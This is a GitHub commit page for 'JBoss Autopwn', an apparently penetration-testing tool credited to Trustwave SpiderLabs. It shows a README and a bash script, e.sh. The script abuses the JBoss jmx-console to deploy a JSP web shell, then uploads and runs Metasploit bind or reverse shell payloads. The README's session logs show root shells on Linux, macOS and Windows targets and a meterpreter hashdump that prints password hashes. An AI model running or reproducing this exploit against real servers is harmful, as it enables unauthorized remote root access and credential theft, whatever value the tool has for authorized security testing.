Permalink
Browse files

First commit

  • Loading branch information...
0 parents commit 3bc2d29ce2e00d46d06519f5a3ca022e8fe29f7a Steve Ocepek committed Mar 7, 2011
Showing with 1,254 additions and 0 deletions.
  1. +674 −0 LICENSE.txt
  2. +252 −0 README.txt
  3. +103 −0 e.sh
  4. +139 −0 e2.sh
  5. +14 −0 execute/req1
  6. +14 −0 execute/req1.win
  7. +15 −0 war/req1.linux
  8. +14 −0 war/req1.win
  9. +15 −0 war/req2.linux
  10. +14 −0 war/req2.win
@@ -0,0 +1,252 @@
+JBoss Autopwn Script
+Christian G. Papathanasiou
+http://www.spiderlabs.com
+
+INTRODUCTION
+============
+
+This JBoss script deploys a JSP shell on the target JBoss AS server. Once
+deployed, the script uses its upload and command execution capability to
+provide an interactive session.
+
+Features include:
+
+- Multiplatform support - tested on Windows, Linux and Mac targets
+- Support for bind and reverse bind shells
+- Meterpreter shells and VNC support for Windows targets
+
+INSTALLATION
+============
+
+Dependencies include
+
+- Netcat
+- Curl
+- Metasploit v3, installed in the current path as "framework3"
+
+USAGE
+=====
+
+Use e.sh for *nix targets that use bind_tcp and reverse_tcp
+
+./e.sh target_ip tcp_port
+
+Use e2.sh for Windows targets that can execute Metasploit Windows payloads
+
+/e2.sh target_ip tcp_port
+
+
+EXAMPLES
+========
+
+Linux bind shell:
+
+[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
+[x] Retrieving cookie
+[x] Now creating BSH script...
+[x] .war file created successfully in /tmp
+[x] Now deploying .war file:
+http://192.168.1.2:8080/browser/browser/browser.jsp
+[x] Running as user...:
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+[x] Server uname...:
+ Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+[!] Would you like to upload a reverse or a bind shell? bind
+[!] On which port would you like the bindshell to listen on? 31337
+[x] Uploading bind shell payload..
+[x] Verifying if upload was successful...
+-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
+[x] You should have a bind shell on 192.168.1.2:31337..
+[x] Dropping you into a shell...
+Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+python -c 'import pty; pty.spawn("/bin/bash")'
+[root@nitrogen /]# full interactive shell :-)
+
+Linux reverse shell:
+
+[root@nitrogen jboss]# nc -lv 31337 &
+[1] 15536
+[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
+[x] Retrieving cookie
+[x] Now creating BSH script...
+[x] .war file created successfully in /tmp
+[x] Now deploying .war file:
+http://192.168.1.2:8080/browser/browser/browser.jsp
+[x] Running as user...:
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+[x] Server uname...:
+ Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+[!] Would you like to upload a reverse or a bind shell? reverse
+[!] On which port would you like to accept the reverse shell on? 31337
+[x] Uploading reverse shell payload..
+[x] Verifying if upload was successful...
+-rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload
+Connection from 192.168.1.2 port 31337 [tcp/*] accepted
+[x] You should have a reverse shell on localhost:31337..
+[root@nitrogen jboss]# jobs
+[1]+ Running nc -lv 31337 &
+[root@nitrogen jboss]# fg 1
+nc -lv 31337
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+python -c 'import pty; pty.spawn("/bin/bash")';
+[root@nitrogen /]# full interactive tty :-)
+full interactive tty :-)
+
+Against MacOS X (bind shell):
+
+[root@nitrogen jboss]# ./e.sh 192.168.1.5 8080 2>/dev/null
+[x] Retrieving cookie
+[x] Now creating BSH script...
+[x] .war file created successfully in /tmp
+[x] Now deploying .war file:
+http://192.168.1.5:8080/browser/browser/browser.jsp
+[x] Running as user...:
+uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)
+[x] Server uname...:
+ Darwin helium-2.tiscali.co.uk 9.7.1 Darwin Kernel Version 9.7.1: Thu Apr 23 13:52:18 PDT 2009; root:xnu-1228.14.1~1/RELEASE_I386 i386
+[!] Would you like to upload a reverse or a bind shell? bind
+[!] On which port would you like the bindshell to listen on? 31337
+[x] Uploading bind shell payload..
+[x] Verifying if upload was successful...
+-rwxrwxrwx 1 root wheel 172 22 Nov 19:58 /tmp/payload
+[x] You should have a bind shell on 192.168.1.5:31337..
+[x] Dropping you into a shell...
+Connection to 192.168.1.5 31337 port [tcp/*] succeeded!
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)
+python -c 'import pty; pty.spawn("/bin/bash")'
+bash-3.2# id
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)
+bash-3.2#
+
+Likewise for the reverse shell.
+
+Windows bind shell:
+
+[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
+[x] Retrieving cookie
+[x] Now creating BSH script...
+[x] .war file created succesfully on c:
+[x] Now deploying .war file:
+[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
+[x] Server name...:
+ Host Name . . . . . . . . . . . . : aquarius
+[x] Would you like a reverse or bind shell or vnc(bind)? bind
+[x] On which port would you like your bindshell to listen? 31337
+[x] Uploading bindshell payload..
+[x] Checking that bind shell was uploaded correctly..
+[x] Bind shell uploaded: 22/11/2009 18:35 87,552 payload.exe
+[x] Now executing bind shell...
+[x] Executed bindshell!
+[x] Reverting to metasploit....
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)
+
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>
+
+
+Windows reverse shell with a Metasploit meterpreter payload:
+
+[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
+[x] Retrieving cookie
+[x] Now creating BSH script...
+[x] .war file created successfully on c:
+[x] Now deploying .war file:
+[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
+[x] Server name...:
+ Host Name . . . . . . . . . . . . : aquarius
+[x] Would you like a reverse or bind shell or vnc(bind)? reverse
+[x] On which port would you like to accept your reverse shell? 31337
+[x] Uploading reverseshell payload..
+[x] Checking that the reverse shell was uploaded correctly..
+[x] Reverse shell uploaded: 22/11/2009 18:46 87,552 payload.exe
+[x] You now have 20 seconds to launch metasploit before I send a reverse shell back.. ctrl-z, bg then type:
+framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E
+[x] Now executing reverse shell...
+[x] Executed reverse shell!
+[root@nitrogen jboss]#
+
+
+In terminal 2:
+
+[root@nitrogen jboss]# framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E
+
+[*] Please wait while we load the module tree...
+[*] Started reverse handler on port 31337
+[*] Starting the payload handler...
+[*] Sending stage (719360 bytes)
+[*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266)
+
+meterpreter > use priv
+Loading extension priv...success.
+meterpreter > hashdump
+Administrator:500:xxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxx:::
+chris:1005:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
+Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+HelpAssistant:1004:5cb061f95caf6a9dc7d1bb971b333632:4ac4ee4210529e17665db586df844736:::
+SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:293c804ee7b7f93b3919344842b9c98a:::
+__vmware_user__:1007:aad3b435b51404eeaad3b435b51404ee:a9fa3213d080de5533c7572775a149f5:::
+meterpreter >
+
+
+Windows VNC shell:
+
+[root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
+[x] Retrieving cookie
+[x] Now creating BSH script...
+[x] .war file created successfully on c:
+[x] Now deploying .war file:
+[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
+[x] Server name...:
+ Host Name . . . . . . . . . . . . : aquarius
+[x] Would you like a reverse or bind shell or vnc(bind)? vnc
+[x] On which port would you like your vnc shell to listen? 21
+[x] Uploading vnc shell payload..
+[x] Checking that vnc shell was uploaded correctly..
+[x] vnc shell uploaded: 22/11/2009 19:14 87,552 payload.exe
+[x] Now executing vnc shell...
+[x] Executed vnc shell!
+[x] Reverting to metasploit....
+[*] Started bind handler
+[*] Starting the payload handler...
+[*] Sending stage (197120 bytes)
+[*] Starting local TCP relay on 127.0.0.1:5900...
+[*] Local TCP relay started.
+[*] Launched vnciewer in the background.
+[*] VNC Server session 1 opened (192.168.1.2:52682 -> 192.168.1.225:21)
+
+[*] VNC connection closed.
+
+[root@nitrogen jboss]#
+
+>>VNC window opens here.. :-)
+
+
+COPYRIGHT
+=========
+
+JBoss Autopwn - A JBoss script for obtaining remote shell access
+Created by Christian G. Papathanasiou
+Copyright (C) 2009-2011 Trustwave Holdings, Inc.
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
103 e.sh
@@ -0,0 +1,103 @@
+#!/bin/bash
+
+# JBoss Autopwn - A JBoss script for obtaining remote shell access
+# Created by Christian G. Papathanasiou
+# Copyright (C) 2009-2011 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see <http://www.gnu.org/licenses/>.
+
+
+if [ -z $1 ]
+then
+printf "[!] JBoss *nix autopwn\n[!] Usage: $0 server port\n"
+printf "[!] Christian Papathanasiou\n[!] Trustwave SpiderLabs\n"
+else
+
+printf "[x] Retrieving cookie\n"
+cookie=`printf "GET /jmx-console/ HTTP/1.1\nHost: $1\n\n" | nc $1 $2 | grep -i JSESSION | cut -d: -f2- | cut -d\; -f1`
+printf "[x] Now creating BSH script...\n"
+A=`sed "s/hostx/$1/g" war/req1.linux | sed "s/portx/$2/g" | sed "s/cookiex/$cookie/g" | nc $1 $2 | grep -i "file:/"`
+if [ -z $A ];
+then
+printf "[!] Cound not create BSH script..\n"
+else
+printf "[x] .war file created successfully in /tmp\n"
+fi
+printf "[x] Now deploying .war file:\n"
+I=`sed "s/hostx/$1/g" war/req2.linux | sed "s/portx/$2/g" | sed "s/cookiex/$cookie/g" | nc $1 $2 | grep -i "succes"`
+if [ -z $I ];
+then
+printf "[x] Something went wrong...\n"
+else
+printf "http://$1:$2/browser/browser/browser.jsp\n"
+browsercookie=`printf "GET /browser/browser/browser.jsp HTTP/1.1\nHost: $1\n\n" | nc $1 $2 | grep -i jsession | cut -d: -f2 | cut -d\; -f1`
+printf "[x] Running as user...:\n"
+B=`sed "s/hostx/$1/g" execute/req1 | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | nc $1 $2 | grep -i uid`
+printf "$B\n"
+printf "[x] Server uname...:\n"
+C=`sed "s/hostx/$1/g" execute/req1 | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed "s/41/49/g" | sed "s/id/uname%20-a/" | nc $1 $2 | grep -v "<" | grep -v ">" | grep -v "{" | grep -v "}" | grep -vi "http" | grep -vi "powered" | grep -vi "content" | grep -vi "date" | grep -vi "server"`
+echo $C
+printf "[!] Would you like to upload a reverse or a bind shell? "
+read shell
+
+
+if [ $shell == "bind" ]
+then
+printf "[!] On which port would you like the bindshell to listen on? "
+read port
+framework3/msfpayload cmd/unix/bind_perl LPORT=$port R >payload
+printf "[x] Uploading bind shell payload..\n"
+curl -F "dir=/tmp" -F "sort=1" -F "name=MyFile" -F "filename=@payload" -F "Submit=Upload" http://$1:$2/browser/browser/browser.jsp 1>/dev/null 2>/dev/null
+printf "[x] Verifying if upload was successful...\n"
+D=`sed "s/hostx/$1/g" execute/req1 | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed "s/41/63/g" | sed "s/id/ls%20-la%20\/tmp\/payload/g" | nc $1 $2 | grep -i payload`
+if [ -z $D ]
+then
+printf "[!] Upload was not successful. You still have a shell though at: /browser/browser/browser.jsp..\n"
+else
+echo $D
+E=`sed "s/hostx/$1/g" execute/req1 | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed "s/41/78/g" | sed "s/id/chmod%20777%20\/tmp\/payload;\/tmp\/payload/g" | nc $1 $2`
+printf "[x] You should have a bind shell on $1:$port..\n"
+rm -rf payload
+printf "[x] Dropping you into a shell...\n"
+nc -v $1 $port
+fi
+fi
+
+
+if [ $shell = "reverse" ]
+then
+myip=`ifconfig -a | grep -i "inet" | cut -d: -f2 | awk '{print $1}' | head -n1`
+printf "[!] On which port would you like to accept the reverse shell on? "
+read port
+framework3/msfpayload cmd/unix/reverse_perl LHOST=$myip LPORT=$port R >payload
+printf "[x] Uploading reverse shell payload..\n"
+curl -F "dir=/tmp" -F "sort=1" -F "name=MyFile" -F "filename=@payload" -F "Submit=Upload" http://$1:$2/browser/browser/browser.jsp 1>/dev/null 2>/dev/null
+printf "[x] Verifying if upload was successful...\n"
+D=`sed "s/hostx/$1/g" execute/req1 | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed "s/41/62/g" | sed "s/id/ls%20-la%20\/tmp\/payload/g" | nc $1 $2 | grep -i payload`
+
+if [ -z $D ]
+then
+printf "[x] Upload was not successful. You still have a shell though at: /browser/browser/browser.jsp..\n"
+else
+echo $D
+E=`sed "s/hostx/$1/g" execute/req1 | sed "s/portx/$2/g" | sed "s/cookiex/$browsercookie/g" | sed "s/41/78/g" | sed "s/id/chmod%20777%20\/tmp\/payload;\/tmp\/payload/g" | nc $1 $2`
+printf "[x] You should have a reverse shell on localhost:$port..\n"
+rm -rf payload
+fi
+fi
+
+
+fi
+
+fi
Oops, something went wrong. Retry.

0 comments on commit 3bc2d29

Please sign in to comment.